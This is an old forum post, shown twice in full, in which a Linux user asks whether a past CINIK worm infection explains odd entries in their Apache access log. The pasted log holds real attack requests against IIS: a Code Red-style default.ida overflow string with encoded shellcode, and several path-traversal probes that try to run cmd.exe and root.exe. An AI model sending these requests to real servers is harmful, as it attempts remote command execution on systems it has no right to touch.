ilin
07-13-2003, 05:55 AM
Hi,
In a 5-6 months ago my PC with RedHat 7.1 was infected with the CINIK WORM. Then I disinfected it as it was described in an antivirus website. But since then, every day, I have these strange lines in my Apache access log:
62.251.228.130 - - [13/Jul/2003:12:43:33 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 200 209
62.163.178.22 - - [17/Jan/2003:18:10:43 +0300] "GET /scripts/root.exe?/c+dir HT\
TP/1.0" 404 214
62.163.178.22 - - [17/Jan/2003:18:10:43 +0300] "GET /MSADC/root.exe?/c+dir HTTP\
/1.0" 404 212
62.163.178.22 - - [17/Jan/2003:18:10:44 +0300] "GET /c/winnt/system32/cmd.exe?/\
c+dir HTTP/1.0" 404 222
62.163.178.22 - - [17/Jan/2003:18:10:45 +0300] "GET /d/winnt/system32/cmd.exe?/\
c+dir HTTP/1.0" 404 222
62.163.178.22 - - [17/Jan/2003:18:10:49 +0300] "GET /scripts/..%255c../winnt/sy\
stem32/cmd.exe?/c+dir HTTP/1.0" 404 236
62.163.178.22 - - [17/Jan/2003:18:10:50 +0300] "GET /_vti_bin/..%255c../..%255c\
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
62.163.178.22 - - [17/Jan/2003:18:10:51 +0300] "GET /_mem_bin/..%255c../..%255c\
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
62.163.178.22 - - [17/Jan/2003:18:10:52 +0300] "GET /msadc/..%255c../..%255c../\
..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\
" 404 269
62.163.178.22 - - [17/Jan/2003:18:10:52 +0300] "GET /scripts/..%c1%1c../winnt/s\
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 235
I can't understand that is my PC still infected with the CINIK WORM /or any other/? Or does something else from my PC provokes those strange requests? And generally :) why are those lines into my access_log, what they mean and can I do something to stop those requests?
Thanks in advance!!!
In a 5-6 months ago my PC with RedHat 7.1 was infected with the CINIK WORM. Then I disinfected it as it was described in an antivirus website. But since then, every day, I have these strange lines in my Apache access log:
62.251.228.130 - - [13/Jul/2003:12:43:33 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 200 209
62.163.178.22 - - [17/Jan/2003:18:10:43 +0300] "GET /scripts/root.exe?/c+dir HT\
TP/1.0" 404 214
62.163.178.22 - - [17/Jan/2003:18:10:43 +0300] "GET /MSADC/root.exe?/c+dir HTTP\
/1.0" 404 212
62.163.178.22 - - [17/Jan/2003:18:10:44 +0300] "GET /c/winnt/system32/cmd.exe?/\
c+dir HTTP/1.0" 404 222
62.163.178.22 - - [17/Jan/2003:18:10:45 +0300] "GET /d/winnt/system32/cmd.exe?/\
c+dir HTTP/1.0" 404 222
62.163.178.22 - - [17/Jan/2003:18:10:49 +0300] "GET /scripts/..%255c../winnt/sy\
stem32/cmd.exe?/c+dir HTTP/1.0" 404 236
62.163.178.22 - - [17/Jan/2003:18:10:50 +0300] "GET /_vti_bin/..%255c../..%255c\
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
62.163.178.22 - - [17/Jan/2003:18:10:51 +0300] "GET /_mem_bin/..%255c../..%255c\
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
62.163.178.22 - - [17/Jan/2003:18:10:52 +0300] "GET /msadc/..%255c../..%255c../\
..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\
" 404 269
62.163.178.22 - - [17/Jan/2003:18:10:52 +0300] "GET /scripts/..%c1%1c../winnt/s\
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 235
I can't understand that is my PC still infected with the CINIK WORM /or any other/? Or does something else from my PC provokes those strange requests? And generally :) why are those lines into my access_log, what they mean and can I do something to stop those requests?
Thanks in advance!!!